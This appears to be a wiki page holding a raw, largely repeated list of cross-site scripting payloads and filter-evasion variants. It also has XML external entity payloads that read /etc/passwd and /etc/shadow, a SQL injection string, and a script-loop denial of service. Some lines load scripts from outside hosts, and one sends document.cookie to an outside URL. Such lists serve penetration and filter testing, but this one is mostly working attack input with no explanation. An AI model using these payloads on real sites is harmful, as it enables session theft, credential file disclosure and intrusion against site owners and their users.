<div onmouseover="document.vulnerable=true;"> | |||
<img src="javascript:document.vulnerable=true;"> | |||
<img dynsrc="javascript:document.vulnerable=true;"> | |||
<input type="image" dynsrc="javascript:document.vulnerable=true;"> | |||
<bgsound src="javascript:document.vulnerable=true;"> | |||
&<script>document.vulnerable=true;</script> | |||
&{document.vulnerable=true;}; | |||
<img src=&{document.vulnerable=true;};> | |||
<link rel="stylesheet" href="javascript:document.vulnerable=true;"> | |||
<iframe src="vbscript:document.vulnerable=true;"> | |||
<img src="mocha:document.vulnerable=true;"> | |||
<img src="livescript:document.vulnerable=true;"> | |||
<a href="about:<script>document.vulnerable=true;</script>"> | |||
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> | |||
<body onload="document.vulnerable=true;"> | |||
<div style="background-image: url(javascript:document.vulnerable=true;);"> | |||
<div style="behaviour: url([link to code]);"> | |||
<div style="binding: url([link to code]);"> | |||
<div style="width: expression(document.vulnerable=true;);"> | |||
<style type="text/javascript">document.vulnerable=true;</style> | |||
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> | |||
<style><!--</style><script>document.vulnerable=true;//--></script> | |||
<<script>document.vulnerable=true;</script> | |||
<![<!--]]<script>document.vulnerable=true;//--></script> | |||
<!-- -- --><script>document.vulnerable=true;</script><!-- -- --> | |||
<img src="blah"onmouseover="document.vulnerable=true;"> | |||
<img src="blah>" onmouseover="document.vulnerable=true;"> | |||
<xml src="javascript:document.vulnerable=true;"> | |||
<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> | |||
<div datafld="b" dataformatas="html" datasrc="#X"></div> | |||
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> | |||
<style>@import'http://www.securitycompass.com/xss.css';</style> | |||
<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> | |||
<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> | |||
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> | |||
<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> | |||
<script SRC="http://www.securitycompass.com/xss.jpg"></script> | |||
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> | |||
<script a=">" SRC="http://www.securitycompass.com/xss.js"></script> | |||
<script =">" SRC="http://www.securitycompass.com/xss.js"></script> | |||
<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> | |||
<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> | |||
<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> | |||
<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> | |||
<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> | |||
<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] | |||
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |||
</script><script>alert(1)</script> | |||
</br style=a:expression(alert())> | |||
<scrscriptipt>alert(1)</scrscriptipt> | |||
<br size=\"&{alert('XSS')}\"> | |||
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out | |||
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out | |||
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |||
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> | |||
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |||
<~/XSS STYLE=xss:expression(alert('XSS'))> | |||
"><script>alert('XSS')</script> | |||
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |||
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |||
XSS STYLE=xss:e/**/xpression(alert('XSS'))> | |||
</XSS STYLE=xss:expression(alert('XSS'))> | |||
';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; | |||
';';;!--";<;XSS>;=&;{()} | |||
<;SCRIPT>;alert(';XSS';)<;/SCRIPT>; | |||
<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>; | |||
<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; | |||
<;BASE HREF=";javascript:alert(';XSS';);//";>; | |||
<;BGSOUND SRC=";javascript:alert(';XSS';);";>; | |||
<;BODY BACKGROUND=";javascript:alert(';XSS';);";>; | |||
<;BODY ONLOAD=alert(';XSS';)>; | |||
<;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>; | |||
<;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>; | |||
<;DIV STYLE=";width: expression(alert(';XSS';));";>; | |||
<;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>; | |||
<;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>; | |||
<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>; | |||
<;IMG SRC=";javascript:alert(';XSS';);";>; | |||
<;IMG SRC=javascript:alert(';XSS';)>; | |||
<;IMG DYNSRC=";javascript:alert(';XSS';);";>; | |||
<;IMG LOWSRC=";javascript:alert(';XSS';);";>; | |||
<;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>; | |||
Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser | |||
exp/*<;XSS STYLE=';no\xss:noxss(";*//*";); | |||
<;STYLE>;li {list-style-image: url(";javascript:alert('XSS')";);}<;/STYLE>;<;UL>;<;LI>;XSS | |||
<;IMG SRC=';vbscript:msgbox(";XSS";)';>; | |||
<;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>; | |||
<;IMG SRC=";livescript:[code]";>; | |||
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE | |||
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>; | |||
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>; | |||
<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>; | |||
<;IMG SRC=";mocha:[code]";>; | |||
<;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>; | |||
<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>; | |||
<;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>; | |||
a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";; eval(a+b+c+d); | |||
<;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>; | |||
<;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>; | |||
<;XSS STYLE=";xss:expression(alert(';XSS';))";>; | |||
<;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>; | |||
<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>; | |||
<;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>; | |||
<;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>; | |||
<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>; | |||
<;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>; | |||
<;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>; | |||
<;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>; | |||
<;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>; | |||
<;HTML xmlns:xss>; | |||
<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>; | |||
<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>; | |||
<;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>; | |||
<;HTML>;<;BODY>; | |||
<;!--[if gte IE 4]>; | |||
<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>; | |||
<;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>; | |||
<;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>; | |||
<;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->; | |||
<;? echo(';<;SCR)';; | |||
<;BR SIZE=";&;{alert(';XSS';)}";>; | |||
<;IMG SRC=JaVaScRiPt:alert(';XSS';)>; | |||
<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>; | |||
<;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>; | |||
<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; | |||
<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>; | |||
<;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>; | |||
<;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>; | |||
<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>; | |||
<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4- | |||
\";;alert(';XSS';);// | |||
<;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>; | |||
<;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>; | |||
<;IMG SRC=";jav	ascript:alert(';XSS';);";>; | |||
<;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>; | |||
<;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>; | |||
<;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>; | |||
<;IMG
SRC
=
";
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t

';
X
S
S
';
)
";
>;
 | |||
perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out | |||
perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out | |||
<;IMG SRC="; &;#14; javascript:alert(';XSS';);";>; | |||
<;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |||
<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; | |||
<;SCRIPT SRC=http://ha.ckers.org/xss.js | |||
<;SCRIPT SRC=//ha.ckers.org/.j>; | |||
<;IMG SRC=";javascript:alert(';XSS';)"; | |||
<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <; | |||
<;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>; | |||
<;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>; | |||
<;SCRIPT>;a=/XSS/ | |||
<;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |||
<;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |||
<;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |||
<;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |||
<;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |||
<;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |||
<;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |||
<;A HREF=";http://66.102.7.147/";>;XSS<;/A>; | |||
<;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>; | |||
<;A HREF=";http://1113982867/";>;XSS<;/A>; | |||
<;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>; | |||
<;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>; | |||
<;A HREF=";h
tt	p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>; | |||
<;A HREF=";//www.google.com/";>;XSS<;/A>; | |||
<;A HREF=";//google";>;XSS<;/A>; | |||
<;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>; | |||
<;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>; | |||
<;A HREF=";http://google.com/";>;XSS<;/A>; | |||
<;A HREF=";http://www.google.com./";>;XSS<;/A>; | |||
<;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>; | |||
<;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>; | |||
<script>document.vulnerable=true;</script> | |||
<img SRC="jav ascript:document.vulnerable=true;"> | |||
<img SRC="javascript:document.vulnerable=true;"> | |||
<img SRC="  javascript:document.vulnerable=true;"> | |||
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> | |||
<<SCRIPT>document.vulnerable=true;//<</SCRIPT> | |||
<script <B>document.vulnerable=true;</script> | |||
<img SRC="javascript:document.vulnerable=true;" | |||
<iframe src="javascript:document.vulnerable=true; < | |||
<script>a=/XSS/\ndocument.vulnerable=true;</script> | |||
\";document.vulnerable=true;;// | |||
</title><SCRIPT>document.vulnerable=true;</script> | |||
<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> | |||
<body BACKGROUND="javascript:document.vulnerable=true;"> | |||
<body ONLOAD=document.vulnerable=true;> | |||
<img DYNSRC="javascript:document.vulnerable=true;"> | |||
<img LOWSRC="javascript:document.vulnerable=true;"> | |||
<bgsound SRC="javascript:document.vulnerable=true;"> | |||
<br SIZE="&{document.vulnerable=true}"> | |||
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER> | |||
<link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> | |||
<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS | |||
<img SRC='vbscript:document.vulnerable=true;'> | |||
1script3document.vulnerable=true;1/script3 | |||
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> | |||
<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> | |||
<IFRAME SRC="javascript:document.vulnerable=true;"></iframe> | |||
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> | |||
<table BACKGROUND="javascript:document.vulnerable=true;"> | |||
<table><TD BACKGROUND="javascript:document.vulnerable=true;"> | |||
<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> | |||
<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> | |||
<div STYLE="width: expression(document.vulnerable=true);"> | |||
<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> | |||
<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> | |||
<XSS STYLE="xss:expression(document.vulnerable=true)"> | |||
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> | |||
<style TYPE="text/javascript">document.vulnerable=true;</style> | |||
<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> | |||
<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> | |||
<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> | |||
<base HREF="javascript:document.vulnerable=true;//"> | |||
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> | |||
<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> | |||
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> | |||
<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> | |||
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> | |||
<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> | |||
<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- | |||
<a href="javascript#document.vulnerable=true;"> | |||
<div onmouseover="document.vulnerable=true;"> | |||
<img src="javascript:document.vulnerable=true;"> | |||
<img dynsrc="javascript:document.vulnerable=true;"> | |||
<input type="image" dynsrc="javascript:document.vulnerable=true;"> | |||
<bgsound src="javascript:document.vulnerable=true;"> | |||
&<script>document.vulnerable=true;</script> | |||
&{document.vulnerable=true;}; | |||
<img src=&{document.vulnerable=true;};> | |||
<link rel="stylesheet" href="javascript:document.vulnerable=true;"> | |||
<iframe src="vbscript:document.vulnerable=true;"> | |||
<img src="mocha:document.vulnerable=true;"> | |||
<img src="livescript:document.vulnerable=true;"> | |||
<a href="about:<script>document.vulnerable=true;</script>"> | |||
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> | |||
<body onload="document.vulnerable=true;"> | |||
<div style="background-image: url(javascript:document.vulnerable=true;);"> | |||
<div style="behaviour: url([link to code]);"> | |||
<div style="binding: url([link to code]);"> | |||
<div style="width: expression(document.vulnerable=true;);"> | |||
<style type="text/javascript">document.vulnerable=true;</style> | |||
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> | |||
<style><!--</style><script>document.vulnerable=true;//--></script> | |||
<<script>document.vulnerable=true;</script> | |||
<![<!--]]<script>document.vulnerable=true;//--></script> | |||
<!-- -- --><script>document.vulnerable=true;</script><!-- -- --> | |||
<img src="blah"onmouseover="document.vulnerable=true;"> | |||
<img src="blah>" onmouseover="document.vulnerable=true;"> | |||
<xml src="javascript:document.vulnerable=true;"> | |||
<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> | |||
<div datafld="b" dataformatas="html" datasrc="#X"></div> | |||
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> | |||
<style>@import'http://www.securitycompass.com/xss.css';</style> | |||
<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> | |||
<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> | |||
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> | |||
<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> | |||
<script SRC="http://www.securitycompass.com/xss.jpg"></script> | |||
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> | |||
<script a=">" SRC="http://www.securitycompass.com/xss.js"></script> | |||
<script =">" SRC="http://www.securitycompass.com/xss.js"></script> | |||
<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> | |||
<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> | |||
<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> | |||
<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> | |||
<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> | |||
<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] | |||
";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; | |||
<;/script>;<;script>;alert(1)<;/script>; | |||
<;/br style=a:expression(alert())>; | |||
<;scrscriptipt>;alert(1)<;/scrscriptipt>; | |||
<;br size=\";&;{alert('XSS')}\";>; | |||
perl -e 'print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;' >; out | |||
perl -e 'print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;' >; out | |||
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |||
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> | |||
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |||
<~/XSS STYLE=xss:expression(alert('XSS'))> | |||
"><script>alert('XSS')</script> | |||
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |||
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |||
XSS STYLE=xss:e/**/xpression(alert('XSS'))> | |||
</XSS STYLE=xss:expression(alert('XSS'))> | |||
>"><script>alert("XSS")</script>& | |||
"><STYLE>@import"javascript:alert('XSS')";</STYLE> | |||
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)> | |||
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> | |||
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' | |||
"> | |||
>" | |||
'';!--"<XSS>=&{()} | |||
<IMG SRC="javascript:alert('XSS');"> | |||
<IMG SRC=javascript:alert('XSS')> | |||
<IMG SRC=JaVaScRiPt:alert('XSS')> | |||
<IMG SRC=JaVaScRiPt:alert("XSS<WBR>")> | |||
<IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('XS<WBR>;S')> | |||
<IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')> | |||
<IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')> | |||
<IMG SRC="jav
ascript:alert(<WBR>'XSS');"> | |||
<IMG SRC="jav
ascript:alert(<WBR>'XSS');"> | |||
<![CDATA[<script>var n=0;while(true){n++;}</script>]]> | |||
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> | |||
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof> | |||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo> | |||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo> | |||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo> | |||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo> | |||
<script>alert('XSS')</script> | |||
%3cscript%3ealert('XSS')%3c/script%3e | |||
%22%3e%3cscript%3ealert('XSS')%3c/script%3e | |||
<IMG SRC="javascript:alert('XSS');"> | |||
<IMG SRC=javascript:alert("XSS")> | |||
<IMG SRC=javascript:alert('XSS')> | |||
<img src=xss onerror=alert(1)> | |||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |||
<IMG SRC="jav ascript:alert('XSS');"> | |||
<IMG SRC="jav	ascript:alert('XSS');"> | |||
<IMG SRC=javascript:alert('XSS')> | |||
<IMG SRC=javascript:alert('XSS')> | |||
<IMG SRC=javascript:alert('XSS')> | |||
<BODY BACKGROUND="javascript:alert('XSS')"> | |||
<BODY ONLOAD=alert('XSS')> | |||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |||
<IMG SRC="javascript:alert('XSS')" | |||
<iframe src=http://ha.ckers.org/scriptlet.html < | |||
<<SCRIPT>alert("XSS");//<</SCRIPT> | |||
%253cscript%253ealert(1)%253c/script%253e | |||
"><s"%2b"cript>alert(document.cookie)</script> | |||
foo<script>alert(1)</script> | |||
<scr<script>ipt>alert(1)</scr</script>ipt> | |||
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> | |||
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |||
<marquee onstart='javascript:alert('1');'>=(◕_◕)= |
Versie van 25 mei 2018 03:20
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x 